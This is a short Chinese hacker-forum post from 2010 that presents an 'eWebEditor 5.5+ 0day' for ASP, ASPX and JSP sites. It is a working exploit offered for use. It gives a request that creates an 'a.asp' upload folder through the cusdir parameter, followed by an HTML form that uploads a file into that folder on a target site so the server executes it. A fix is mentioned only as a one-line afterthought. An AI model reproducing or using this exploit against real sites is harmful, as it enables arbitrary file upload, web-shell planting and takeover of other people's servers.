蓝盟诗人[LUC]蓝客联盟

忘记密码

ewebeditor高版本>=5.5鸡肋0day

2010-09-26 22:26 作者: 来源: 本站 浏览: 1,460 views 我要评论 字号:

对6.X的也管用,对ASP。aspx。JSP。均管用。
利用方法:
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。
<form action="http://www.xxx.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

修复方案:严格过滤

转载自 http://chnlanker.com/thread-19359-1-1.html

打印
分享到:
复制链接

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

/** **/